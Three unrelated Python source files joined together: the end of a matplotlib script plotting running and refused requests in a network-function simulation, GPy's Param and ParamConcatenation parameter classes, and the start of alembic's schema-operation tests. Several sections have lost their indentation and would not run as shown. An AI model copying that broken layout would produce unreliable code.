lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
if start_count != 0 or finish_count != float('inf'):
plt.xlim(xmin=start_count, xmax=finish_count)
if nolegend:
plt.legend().set_visible(False)
plt.savefig(path + "running_requests" + str(time.ctime()). \
replace(' ', '_').replace(':', '-') + "." + format, bbox_extra_artists=(lgd,), bbox_inches='tight')
plt.clf()
# Create Running picture with time axis
if running_online_req_list is not None:
i = 0
for element in running_online_req_list:
color = on_act_colors[i]
line = on_act_lines[i]
marker = on_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80],
dashes=line, marker=marker, markersize=marker_size, markevery=mark_every)
i += 1
if running_offline_req_list is not None:
i = 0
for element in running_offline_req_list:
color = off_act_colors[i]
line = off_act_lines[i]
marker = off_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if running_hybrid_req_list is not None:
i = 0
for element in running_hybrid_req_list:
color = hy_act_colors[i]
line = hy_act_lines[i]
marker = hy_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
plt.grid('on')
plt.title('Currently running (mapped) requests in the NFFG')
plt.ylabel('Requests count')
plt.xlabel('Sec')
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
if nolegend:
plt.legend().set_visible(False)
# TODO: fix zoom with time axis too
plt.savefig(path + "running_requests_with_time_axis" + str(time.ctime()). \
replace(' ', '_').replace(':', '-') + "." + format, bbox_extra_artists=(lgd,), bbox_inches='tight')
plt.clf()
# Create refused picture
if refused_online_req_list is not None:
i = 0
for element in refused_online_req_list:
color = on_act_colors[i]
line = on_act_lines[i]
marker = on_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if refused_offline_req_list is not None:
i = 0
for element in refused_offline_req_list:
color = off_act_colors[i]
line = off_act_lines[i]
marker = off_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if refused_hybrid_req_list is not None:
i = 0
for element in refused_hybrid_req_list:
color = hy_act_colors[i]
line = hy_act_lines[i]
marker = hy_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
plt.title('Refused requests during the simulation')
plt.ylabel('Refused requests count')
plt.xlabel('Incoming requests')
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
if start_count != 0 or finish_count != float('inf'):
plt.xlim(xmin=start_count, xmax=finish_count)
if nolegend:
plt.legend().set_visible(False)
plt.grid('on')
plt.savefig(path + "refused_requests" + str(time.ctime()). \
replace(' ', '_').replace(':', '-') + "." + format, bbox_extra_artists=(lgd,), bbox_inches='tight')
plt.clf()
# Create refused picture with time
if refused_online_req_list is not None:
i = 0
for element in refused_online_req_list:
color = on_act_colors[i]
line = on_act_lines[i]
marker = on_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if refused_offline_req_list is not None:
i = 0
for element in refused_offline_req_list:
color = off_act_colors[i]
line = off_act_lines[i]
marker = off_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if refused_hybrid_req_list is not None:
i = 0
for element in refused_hybrid_req_list:
color = hy_act_colors[i]
line = hy_act_lines[i]
marker = hy_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
plt.grid('on')
plt.title('Refused requests during the simulation')
plt.ylabel('Refused requests count')
plt.xlabel('Sec')
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
if nolegend:
plt.legend().set_visible(False)
# TODO: fix zoom with time axis too
plt.savefig(path + "refused_requests_with_time_axis" + str(time.ctime()). \
replace(' ', '_').replace(':', '-') + "." + format, bbox_extra_artists=(lgd,), bbox_inches='tight')
print('\x1b[1;32;0m' + 'Creating plots are DONE :)' + '\x1b[0m')
# Script entry point: forward the command line arguments (program name stripped).
if __name__ == "__main__":
    main(sys.argv[1:])
|
|
# Copyright (c) 2014, Max Zwiessele
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import itertools
import numpy
np = numpy
from parameter_core import Parameterizable, adjust_name_for_printing, Pickleable
from observable_array import ObsAr
###### printing
# Column headers used by the parameter pretty-printing routines below.
__constraints_name__ = "Constraint"
__index_name__ = "Index"
__tie_name__ = "Tied to"
__priors_name__ = "Prior"
__precision__ = numpy.get_printoptions()['precision'] # numpy printing precision used, subclassing numpy ndarray after all
__print_threshold__ = 5
######
class Param(Parameterizable, ObsAr):
    """
    Parameter object for GPy models.

    :param str name: name of the parameter to be printed
    :param input_array: array which this parameter handles
    :type input_array: numpy.ndarray
    :param default_constraint: The default constraint for this parameter
    :type default_constraint:

    You can add/remove constraints by calling constrain on the parameter itself, e.g:

        - self[:,1].constrain_positive()
        - self[0].tie_to(other)
        - self.untie()
        - self[:3,:].unconstrain()
        - self[1].fix()

    Fixing parameters will fix them to the value they are right now. If you change
    the fixed value, it will be fixed to the new value!

    See :py:class:`GPy.core.parameterized.Parameterized` for more details on constraining etc.
    """
    __array_priority__ = -1 # Never give back Param
    _fixes_ = None
    parameters = []
    def __new__(cls, name, input_array, default_constraint=None):
        # ndarray subclasses allocate in __new__; record the "real" (unsliced)
        # geometry so later views can map their slice back into the original.
        obj = numpy.atleast_1d(super(Param, cls).__new__(cls, input_array=input_array))
        obj._current_slice_ = (slice(obj.shape[0]),)
        obj._realshape_ = obj.shape
        obj._realsize_ = obj.size
        obj._realndim_ = obj.ndim
        obj._original_ = obj
        return obj
    def __init__(self, name, input_array, default_constraint=None, *a, **kw):
        # guard flag so init-time writes can be told apart from user writes
        self._in_init_ = True
        super(Param, self).__init__(name=name, default_constraint=default_constraint, *a, **kw)
        self._in_init_ = False
    def build_pydot(self,G):
        """Add this parameter as a trapezium node to the pydot graph G, link
        it to all of its observers and return the created node."""
        import pydot
        node = pydot.Node(id(self), shape='trapezium', label=self.name)#, fontcolor='white', color='white')
        G.add_node(node)
        for _, o, _ in self.observers:
            label = o.name if hasattr(o, 'name') else str(o)
            observed_node = pydot.Node(id(o), label=label)
            G.add_node(observed_node)
            edge = pydot.Edge(str(id(self)), str(id(o)), color='darkorange2', arrowhead='vee')
            G.add_edge(edge)
        return node
    def __array_finalize__(self, obj):
        # see InfoArray.__array_finalize__ for comments
        # runs on every view/copy: propagate all bookkeeping attributes so
        # sliced Params still know their parent and real shape
        if obj is None: return
        super(Param, self).__array_finalize__(obj)
        self._parent_ = getattr(obj, '_parent_', None)
        self._parent_index_ = getattr(obj, '_parent_index_', None)
        self._default_constraint_ = getattr(obj, '_default_constraint_', None)
        self._current_slice_ = getattr(obj, '_current_slice_', None)
        self._realshape_ = getattr(obj, '_realshape_', None)
        self._realsize_ = getattr(obj, '_realsize_', None)
        self._realndim_ = getattr(obj, '_realndim_', None)
        self._original_ = getattr(obj, '_original_', None)
        self._name = getattr(obj, '_name', None)
        self._gradient_array_ = getattr(obj, '_gradient_array_', None)
        self.constraints = getattr(obj, 'constraints', None)
        self.priors = getattr(obj, 'priors', None)
    @property
    def param_array(self):
        """
        As we are a leaf, this just returns self
        """
        return self
    @property
    def values(self):
        """
        Return self as numpy array view
        """
        return self.view(np.ndarray)
    @property
    def gradient(self):
        """
        Return a view on the gradient, which is in the same shape as this parameter is.
        Note: this is not the real gradient array, it is just a view on it.

        To work on the real gradient array use: self.full_gradient
        """
        # lazily allocated on first access
        if getattr(self, '_gradient_array_', None) is None:
            self._gradient_array_ = numpy.empty(self._realshape_, dtype=numpy.float64)
        return self._gradient_array_#[self._current_slice_]
    @gradient.setter
    def gradient(self, val):
        # in-place assignment keeps existing views on the gradient valid
        self._gradient_array_[:] = val
    #===========================================================================
    # Array operations -> done
    #===========================================================================
    def __getitem__(self, s, *args, **kwargs):
        """Slice like an ndarray but keep the slice/gradient bookkeeping on
        the returned view so constraints can be applied to sub-slices."""
        if not isinstance(s, tuple):
            s = (s,)
        #if not reduce(lambda a, b: a or numpy.any(b is Ellipsis), s, False) and len(s) <= self.ndim:
        #    s += (Ellipsis,)
        new_arr = super(Param, self).__getitem__(s, *args, **kwargs)
        try:
            new_arr._current_slice_ = s
            new_arr._gradient_array_ = self.gradient[s]
            new_arr._original_ = self._original_
        except AttributeError: pass  # returning 0d array or float, double etc
        return new_arr
    def _raveled_index(self, slice_index=None):
        # return an index array on the raveled array, which is formed by the current_slice
        # of this object
        # extended_realshape are the strides (in elements) of the real shape;
        # dotting them with the nd indices yields flat positions
        extended_realshape = numpy.cumprod((1,) + self._realshape_[:0:-1])[::-1]
        ind = self._indices(slice_index)
        if ind.ndim < 2: ind = ind[:, None]
        return numpy.asarray(numpy.apply_along_axis(lambda x: numpy.sum(extended_realshape * x), 1, ind), dtype=int)
    def _raveled_index_for(self, obj):
        # leaves ignore `obj`; the raveled index is always their own
        return self._raveled_index()
    #===========================================================================
    # Constrainable
    #===========================================================================
    def _ensure_fixes(self):
        # allocate the boolean fixes mask on demand (True == free parameter)
        if not self._has_fixes(): self._fixes_ = numpy.ones(self._realsize_, dtype=bool)
    #===========================================================================
    # Convenience
    #===========================================================================
    @property
    def is_fixed(self):
        """True when every element of this parameter carries the fixed constraint."""
        from transformations import __fixed__
        return self.constraints[__fixed__].size == self.size
    def _get_original(self, param):
        # leaves always resolve to the unsliced original array
        return self._original_
    #===========================================================================
    # Pickling and copying
    #===========================================================================
    def copy(self):
        return Parameterizable.copy(self, which=self)
    def __deepcopy__(self, memo):
        # copy the raw ndarray data, then restore the rest of the state via
        # the Pickleable protocol so constraints/priors survive the copy
        s = self.__new__(self.__class__, name=self.name, input_array=self.view(numpy.ndarray).copy())
        memo[id(self)] = s
        import copy
        Pickleable.__setstate__(s, copy.deepcopy(self.__getstate__(), memo))
        return s
    def _setup_observers(self):
        """
        Setup the default observers

        1: pass through to parent, if present
        """
        if self.has_parent():
            self.add_observer(self._parent_, self._parent_._pass_through_notify_observers, -np.inf)
    #===========================================================================
    # Printing -> done
    #===========================================================================
    @property
    def _description_str(self):
        # scalars print their value, larger parameters just their shape
        if self.size <= 1:
            return [str(self.view(numpy.ndarray)[0])]
        else: return [str(self.shape)]
    def parameter_names(self, add_self=False, adjust_for_printing=False, recursive=True):
        # this is just overwriting the parameterized calls to parameter names, in order to maintain OOP
        if adjust_for_printing:
            return [adjust_name_for_printing(self.name)]
        return [self.name]
    @property
    def flattened_parameters(self):
        return [self]
    @property
    def parameter_shapes(self):
        return [self.shape]
    @property
    def num_params(self):
        # a leaf holds no child parameters
        return 0
    @property
    def _constraints_str(self):
        # constraints covering the whole parameter print bare, partial ones in {}
        return [' '.join(map(lambda c: str(c[0]) if c[1].size == self._realsize_ else "{" + str(c[0]) + "}", self.constraints.iteritems()))]
    @property
    def _priors_str(self):
        # same convention as _constraints_str, but for priors
        return [' '.join(map(lambda c: str(c[0]) if c[1].size == self._realsize_ else "{" + str(c[0]) + "}", self.priors.iteritems()))]
    @property
    def _ties_str(self):
        return ['']
    def _ties_for(self, ravi):
        # leaves carry no tie information; one placeholder per index
        return [['N/A']]*ravi.size
    def __repr__(self, *args, **kwargs):
        # bold (ANSI) hierarchy name followed by the ndarray repr
        name = "\033[1m{x:s}\033[0;0m:\n".format(
            x=self.hierarchy_name())
        return name + super(Param, self).__repr__(*args, **kwargs)
    def _indices(self, slice_index=None):
        # get a int-array containing all indices in the first axis.
        if slice_index is None:
            slice_index = self._current_slice_
        try:
            indices = np.indices(self._realshape_, dtype=int)
            indices = indices[(slice(None),)+slice_index]
            indices = np.rollaxis(indices, 0, indices.ndim).reshape(-1,self._realndim_)
            #print indices_
            #if not np.all(indices==indices__):
            #    import ipdb; ipdb.set_trace()
        except:
            # fallback: keep the un-flattened index grid when reshape fails
            indices = np.indices(self._realshape_, dtype=int)
            indices = indices[(slice(None),)+slice_index]
            indices = np.rollaxis(indices, 0, indices.ndim)
        return indices
    def _max_len_names(self, gen, header):
        # widest entry in `gen` (or the header) — used for column alignment
        gen = map(lambda x: " ".join(map(str, x)), gen)
        return reduce(lambda a, b:max(a, len(b)), gen, len(header))
    def _max_len_values(self):
        # widest formatted value (or the parameter's own name)
        return reduce(lambda a, b:max(a, len("{x:=.{0}g}".format(__precision__, x=b))), self.flat, len(self.hierarchy_name()))
    def _max_len_index(self, ind):
        return reduce(lambda a, b:max(a, len(str(b))), ind, len(__index_name__))
    def _short(self):
        # short string to print
        name = self.hierarchy_name()
        if self._realsize_ < 2:
            return name
        ind = self._indices()
        # abbreviate long index lists as "first two ... last two"
        if ind.size > 4: indstr = ','.join(map(str, ind[:2])) + "..." + ','.join(map(str, ind[-2:]))
        else: indstr = ','.join(map(str, ind))
        return name + '[' + indstr + ']'
    def _repr_html_(self, constr_matrix=None, indices=None, prirs=None, ties=None):
        """Representation of the parameter in html for notebook display."""
        filter_ = self._current_slice_
        vals = self.flat
        if indices is None: indices = self._indices(filter_)
        ravi = self._raveled_index(filter_)
        if constr_matrix is None: constr_matrix = self.constraints.properties_for(ravi)
        if prirs is None: prirs = self.priors.properties_for(ravi)
        if ties is None: ties = self._ties_for(ravi)
        ties = [' '.join(map(lambda x: x, t)) for t in ties]
        header_format = """
<tr>
  <th><b>{i}</b></th>
  <th><b>{x}</b></th>
  <th><b>{c}</b></th>
  <th><b>{p}</b></th>
  <th><b>{t}</b></th>
</tr>"""
        header = header_format.format(x=self.hierarchy_name(), c=__constraints_name__, i=__index_name__, t=__tie_name__, p=__priors_name__) # nice header for printing
        if not ties: ties = itertools.cycle([''])
        return "\n".join(["""<style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;border-color:#999;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:2px 3px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:#999;color:#444;background-color:#F7FDFA;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:2px 3px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:#999;color:#fff;background-color:#26ADE4;}
.tg .tg-left{font-family:"Courier New", Courier, monospace !important;;text-align:left}
.tg .tg-right{font-family:"Courier New", Courier, monospace !important;;text-align:right}
</style>"""] + ['<table class="tg">'] + [header] + ["<tr><td class=tg-left>{i}</td><td class=tg-right>{x}</td><td class=tg-left>{c}</td><td class=tg-left>{p}</td><td class=tg-left>{t}</td></tr>".format(x=x, c=" ".join(map(str, c)), p=" ".join(map(str, p)), t=(t or ''), i=i) for i, x, c, t, p in itertools.izip(indices, vals, constr_matrix, ties, prirs)] + ["</table>"])
    def __str__(self, constr_matrix=None, indices=None, prirs=None, ties=None, lc=None, lx=None, li=None, lp=None, lt=None, only_name=False):
        """Aligned plain-text table of indices, values, constraints, priors and
        ties; the l* widths allow a ParamConcatenation to align several
        parameters into one table."""
        filter_ = self._current_slice_
        vals = self.flat
        if indices is None: indices = self._indices(filter_)
        ravi = self._raveled_index(filter_)
        if constr_matrix is None: constr_matrix = self.constraints.properties_for(ravi)
        if prirs is None: prirs = self.priors.properties_for(ravi)
        if ties is None: ties = self._ties_for(ravi)
        ties = [' '.join(map(lambda x: x, t)) for t in ties]
        if lc is None: lc = self._max_len_names(constr_matrix, __constraints_name__)
        if lx is None: lx = self._max_len_values()
        if li is None: li = self._max_len_index(indices)
        if lt is None: lt = self._max_len_names(ties, __tie_name__)
        if lp is None: lp = self._max_len_names(prirs, __tie_name__)
        sep = '-'
        header_format = "  {i:{5}^{2}s}  |  \033[1m{x:{5}^{1}s}\033[0;0m  |  {c:{5}^{0}s}  |  {p:{5}^{4}s}  |  {t:{5}^{3}s}"
        if only_name: header = header_format.format(lc, lx, li, lt, lp, ' ', x=self.hierarchy_name(), c=sep*lc, i=sep*li, t=sep*lt, p=sep*lp) # nice header for printing
        else: header = header_format.format(lc, lx, li, lt, lp, ' ', x=self.hierarchy_name(), c=__constraints_name__, i=__index_name__, t=__tie_name__, p=__priors_name__) # nice header for printing
        if not ties: ties = itertools.cycle([''])
        return "\n".join([header] + ["  {i!s:^{3}s}  |  {x: >{1}.{2}g}  |  {c:^{0}s}  |  {p:^{5}s}  |  {t:^{4}s}  ".format(lc, lx, __precision__, li, lt, lp, x=x, c=" ".join(map(str, c)), p=" ".join(map(str, p)), t=(t or ''), i=i) for i, x, c, t, p in itertools.izip(indices, vals, constr_matrix, ties, prirs)]) # return all the constraints with right indices
        # except: return super(Param, self).__str__()
class ParamConcatenation(object):
def __init__(self, params):
"""
Parameter concatenation for convenience of printing regular expression matched arrays
you can index this concatenation as if it was the flattened concatenation
of all the parameters it contains, same for setting parameters (Broadcasting enabled).
See :py:class:`GPy.core.parameter.Param` for more details on constraining.
"""
# self.params = params
from lists_and_dicts import ArrayList
self.params = ArrayList([])
for p in params:
for p in p.flattened_parameters:
if p not in self.params:
self.params.append(p)
self._param_sizes = [p.size for p in self.params]
startstops = numpy.cumsum([0] + self._param_sizes)
self._param_slices_ = [slice(start, stop) for start,stop in zip(startstops, startstops[1:])]
parents = dict()
for p in self.params:
if p.has_parent():
parent = p._parent_
level = 0
while parent is not None:
if parent in parents:
parents[parent] = max(level, parents[parent])
else:
parents[parent] = level
level += 1
parent = parent._parent_
import operator
self.parents = map(lambda x: x[0], sorted(parents.iteritems(), key=operator.itemgetter(1)))
#===========================================================================
# Get/set items, enable broadcasting
#===========================================================================
def __getitem__(self, s):
ind = numpy.zeros(sum(self._param_sizes), dtype=bool); ind[s] = True;
params = [p.param_array.flat[ind[ps]] for p,ps in zip(self.params, self._param_slices_) if numpy.any(p.param_array.flat[ind[ps]])]
if len(params)==1: return params[0]
return ParamConcatenation(params)
def __setitem__(self, s, val, update=True):
if isinstance(val, ParamConcatenation):
val = val.values()
ind = numpy.zeros(sum(self._param_sizes), dtype=bool); ind[s] = True;
vals = self.values(); vals[s] = val
for p, ps in zip(self.params, self._param_slices_):
p.flat[ind[ps]] = vals[ps]
if update:
self.update_all_params()
def values(self):
return numpy.hstack([p.param_array.flat for p in self.params])
#===========================================================================
# parameter operations:
#===========================================================================
def update_all_params(self):
for par in self.parents:
par.notify_observers()
def constrain(self, constraint, warning=True):
[param.constrain(constraint, trigger_parent=False) for param in self.params]
self.update_all_params()
constrain.__doc__ = Param.constrain.__doc__
def constrain_positive(self, warning=True):
[param.constrain_positive(warning, trigger_parent=False) for param in self.params]
self.update_all_params()
constrain_positive.__doc__ = Param.constrain_positive.__doc__
def constrain_fixed(self, value=None, warning=True, trigger_parent=True):
[param.constrain_fixed(value, warning, trigger_parent) for param in self.params]
constrain_fixed.__doc__ = Param.constrain_fixed.__doc__
fix = constrain_fixed
def constrain_negative(self, warning=True):
[param.constrain_negative(warning, trigger_parent=False) for param in self.params]
self.update_all_params()
constrain_negative.__doc__ = Param.constrain_negative.__doc__
def constrain_bounded(self, lower, upper, warning=True):
[param.constrain_bounded(lower, upper, warning, trigger_parent=False) for param in self.params]
self.update_all_params()
constrain_bounded.__doc__ = Param.constrain_bounded.__doc__
def unconstrain(self, *constraints):
[param.unconstrain(*constraints) for param in self.params]
unconstrain.__doc__ = Param.unconstrain.__doc__
def unconstrain_negative(self):
[param.unconstrain_negative() for param in self.params]
unconstrain_negative.__doc__ = Param.unconstrain_negative.__doc__
def unconstrain_positive(self):
[param.unconstrain_positive() for param in self.params]
unconstrain_positive.__doc__ = Param.unconstrain_positive.__doc__
def unconstrain_fixed(self):
[param.unconstrain_fixed() for param in self.params]
unconstrain_fixed.__doc__ = Param.unconstrain_fixed.__doc__
unfix = unconstrain_fixed
def unconstrain_bounded(self, lower, upper):
[param.unconstrain_bounded(lower, upper) for param in self.params]
unconstrain_bounded.__doc__ = Param.unconstrain_bounded.__doc__
def untie(self, *ties):
[param.untie(*ties) for param in self.params]
def checkgrad(self, verbose=0, step=1e-6, tolerance=1e-3):
return self.params[0]._highest_parent_._checkgrad(self, verbose, step, tolerance)
#checkgrad.__doc__ = Gradcheckable.checkgrad.__doc__
__lt__ = lambda self, val: self.values() < val
__le__ = lambda self, val: self.values() <= val
__eq__ = lambda self, val: self.values() == val
__ne__ = lambda self, val: self.values() != val
__gt__ = lambda self, val: self.values() > val
__ge__ = lambda self, val: self.values() >= val
    def __str__(self, *args, **kwargs):
        """Render all wrapped parameters as one aligned, combined table.

        Column widths (constraints, values, indices, ties, priors) are
        computed as maxima over *all* parameters first so every
        per-parameter block lines up in the joined output.

        NOTE: relies on ``itertools.izip`` and is therefore Python 2 only.
        """
        def f(p):
            # Per-parameter (constraints, ties, priors) property matrices,
            # looked up by the parameter's raveled index.
            ind = p._raveled_index()
            return p.constraints.properties_for(ind), p._ties_for(ind), p.priors.properties_for(ind)
        params = self.params
        constr_matrices, ties_matrices, prior_matrices = zip(*map(f, params))
        indices = [p._indices() for p in params]
        # Global maximum column widths across all parameters.
        lc = max([p._max_len_names(cm, __constraints_name__) for p, cm in itertools.izip(params, constr_matrices)])
        lx = max([p._max_len_values() for p in params])
        li = max([p._max_len_index(i) for p, i in itertools.izip(params, indices)])
        lt = max([p._max_len_names(tm, __tie_name__) for p, tm in itertools.izip(params, ties_matrices)])
        lp = max([p._max_len_names(pm, __constraints_name__) for p, pm in itertools.izip(params, prior_matrices)])
        strings = []
        start = True
        # only_name flips after the first parameter, so only the first block
        # prints the full header row.
        for p, cm, i, tm, pm in itertools.izip(params,constr_matrices,indices,ties_matrices,prior_matrices):
            # NOTE(review): ``prirs`` looks like a typo for "priors", but is
            # presumably the keyword Param.__str__ actually accepts — confirm
            # against Param.__str__'s signature before renaming.
            strings.append(p.__str__(constr_matrix=cm, indices=i, prirs=pm, ties=tm, lc=lc, lx=lx, li=li, lp=lp, lt=lt, only_name=(1-start)))
            start = False
        return "\n".join(strings)
def __repr__(self):
return "\n".join(map(repr,self.params))
def __ilshift__(self, *args, **kwargs):
self[:] = np.ndarray.__ilshift__(self.values(), *args, **kwargs)
def __irshift__(self, *args, **kwargs):
self[:] = np.ndarray.__irshift__(self.values(), *args, **kwargs)
def __ixor__(self, *args, **kwargs):
self[:] = np.ndarray.__ixor__(self.values(), *args, **kwargs)
def __ipow__(self, *args, **kwargs):
self[:] = np.ndarray.__ipow__(self.values(), *args, **kwargs)
def __ifloordiv__(self, *args, **kwargs):
self[:] = np.ndarray.__ifloordiv__(self.values(), *args, **kwargs)
def __isub__(self, *args, **kwargs):
self[:] = np.ndarray.__isub__(self.values(), *args, **kwargs)
def __ior__(self, *args, **kwargs):
self[:] = np.ndarray.__ior__(self.values(), *args, **kwargs)
def __itruediv__(self, *args, **kwargs):
self[:] = np.ndarray.__itruediv__(self.values(), *args, **kwargs)
def __idiv__(self, *args, **kwargs):
self[:] = np.ndarray.__idiv__(self.values(), *args, **kwargs)
def __iand__(self, *args, **kwargs):
self[:] = np.ndarray.__iand__(self.values(), *args, **kwargs)
def __imod__(self, *args, **kwargs):
self[:] = np.ndarray.__imod__(self.values(), *args, **kwargs)
def __iadd__(self, *args, **kwargs):
self[:] = np.ndarray.__iadd__(self.values(), *args, **kwargs)
def __imul__(self, *args, **kwargs):
self[:] = np.ndarray.__imul__(self.values(), *args, **kwargs)
|
|
"""Test against the builders in the op.* module."""
from sqlalchemy import Integer, Column, ForeignKey, \
Table, String, Boolean
from sqlalchemy.sql import column, func, text
from sqlalchemy import event
from alembic import op
from alembic.testing.fixtures import op_fixture
from alembic.testing import eq_, assert_raises_message, is_
from alembic.testing import mock
from alembic.testing.fixtures import TestBase
from alembic.testing import config
from alembic.operations import schemaobj, ops
@event.listens_for(Table, "after_parent_attach")
def _add_cols(table, metadata):
    """SQLAlchemy event hook: append a 'bat' column to the one table used
    by the auto-append tests; all other tables pass through untouched."""
    if table.name != "tbl_with_auto_appended_column":
        return
    table.append_column(Column('bat', Integer))
class OpTest(TestBase):
def test_rename_table(self):
context = op_fixture()
op.rename_table('t1', 't2')
context.assert_("ALTER TABLE t1 RENAME TO t2")
def test_rename_table_schema(self):
context = op_fixture()
op.rename_table('t1', 't2', schema="foo")
context.assert_("ALTER TABLE foo.t1 RENAME TO foo.t2")
def test_rename_table_postgresql(self):
context = op_fixture("postgresql")
op.rename_table('t1', 't2')
context.assert_("ALTER TABLE t1 RENAME TO t2")
def test_rename_table_schema_postgresql(self):
context = op_fixture("postgresql")
op.rename_table('t1', 't2', schema="foo")
context.assert_("ALTER TABLE foo.t1 RENAME TO t2")
def test_create_index_no_expr_allowed(self):
op_fixture()
assert_raises_message(
ValueError,
"String or text\(\) construct expected",
op.create_index, 'name', 'tname', [func.foo(column('x'))]
)
@config.requirements.sqlalchemy_09
def test_add_column_schema_hard_quoting(self):
from sqlalchemy.sql.schema import quoted_name
context = op_fixture("postgresql")
op.add_column(
"somename", Column("colname", String),
schema=quoted_name("some.schema", quote=True))
context.assert_(
'ALTER TABLE "some.schema".somename ADD COLUMN colname VARCHAR'
)
@config.requirements.sqlalchemy_09
def test_rename_table_schema_hard_quoting(self):
from sqlalchemy.sql.schema import quoted_name
context = op_fixture("postgresql")
op.rename_table(
't1', 't2',
schema=quoted_name("some.schema", quote=True))
context.assert_(
'ALTER TABLE "some.schema".t1 RENAME TO t2'
)
@config.requirements.sqlalchemy_09
def test_add_constraint_schema_hard_quoting(self):
from sqlalchemy.sql.schema import quoted_name
context = op_fixture("postgresql")
op.create_check_constraint(
"ck_user_name_len",
"user_table",
func.len(column('name')) > 5,
schema=quoted_name("some.schema", quote=True)
)
context.assert_(
'ALTER TABLE "some.schema".user_table ADD '
'CONSTRAINT ck_user_name_len CHECK (len(name) > 5)'
)
def test_create_index_quoting(self):
context = op_fixture("postgresql")
op.create_index(
'geocoded',
'locations',
["IShouldBeQuoted"])
context.assert_(
'CREATE INDEX geocoded ON locations ("IShouldBeQuoted")')
@config.requirements.fail_before_sqla_080
def test_create_index_expressions(self):
context = op_fixture()
op.create_index(
'geocoded',
'locations',
[text('lower(coordinates)')])
context.assert_(
"CREATE INDEX geocoded ON locations (lower(coordinates))")
@config.requirements.fail_before_sqla_080
def test_create_index_postgresql_expressions(self):
context = op_fixture("postgresql")
op.create_index(
'geocoded',
'locations',
[text('lower(coordinates)')],
postgresql_where=text("locations.coordinates != Null"))
context.assert_(
"CREATE INDEX geocoded ON locations (lower(coordinates)) "
"WHERE locations.coordinates != Null")
def test_create_index_postgresql_where(self):
context = op_fixture("postgresql")
op.create_index(
'geocoded',
'locations',
['coordinates'],
postgresql_where=text("locations.coordinates != Null"))
context.assert_(
"CREATE INDEX geocoded ON locations (coordinates) "
"WHERE locations.coordinates != Null")
def test_add_column(self):
context = op_fixture()
op.add_column('t1', Column('c1', Integer, nullable=False))
context.assert_("ALTER TABLE t1 ADD COLUMN c1 INTEGER NOT NULL")
def test_add_column_schema(self):
context = op_fixture()
op.add_column('t1', Column('c1', Integer, nullable=False), schema="foo")
context.assert_("ALTER TABLE foo.t1 ADD COLUMN c1 INTEGER NOT NULL")
def test_add_column_with_default(self):
context = op_fixture()
op.add_column(
't1', Column('c1', Integer, nullable=False, server_default="12"))
context.assert_(
"ALTER TABLE t1 ADD COLUMN c1 INTEGER DEFAULT '12' NOT NULL")
def test_add_column_with_index(self):
context = op_fixture()
op.add_column(
't1', Column('c1', Integer, nullable=False, index=True))
context.assert_(
"ALTER TABLE t1 ADD COLUMN c1 INTEGER NOT NULL",
"CREATE INDEX ix_t1_c1 ON t1 (c1)",
)
def test_add_column_schema_with_default(self):
context = op_fixture()
op.add_column('t1',
Column('c1', Integer, nullable=False, server_default="12"),
schema='foo')
context.assert_(
"ALTER TABLE foo.t1 ADD COLUMN c1 INTEGER DEFAULT '12' NOT NULL")
def test_add_column_fk(self):
context = op_fixture()
op.add_column(
't1', Column('c1', Integer, ForeignKey('c2.id'), nullable=False))
context.assert_(
"ALTER TABLE t1 ADD COLUMN c1 INTEGER NOT NULL",
"ALTER TABLE t1 ADD FOREIGN KEY(c1) REFERENCES c2 (id)"
)
def test_add_column_schema_fk(self):
context = op_fixture()
op.add_column('t1',
Column('c1', Integer, ForeignKey('c2.id'), nullable=False),
schema='foo')
context.assert_(
"ALTER TABLE foo.t1 ADD COLUMN c1 INTEGER NOT NULL",
"ALTER TABLE foo.t1 ADD FOREIGN KEY(c1) REFERENCES c2 (id)"
)
def test_add_column_schema_type(self):
"""Test that a schema type generates its constraints...."""
context = op_fixture()
op.add_column('t1', Column('c1', Boolean, nullable=False))
context.assert_(
'ALTER TABLE t1 ADD COLUMN c1 BOOLEAN NOT NULL',
'ALTER TABLE t1 ADD CHECK (c1 IN (0, 1))'
)
def test_add_column_schema_schema_type(self):
"""Test that a schema type generates its constraints...."""
context = op_fixture()
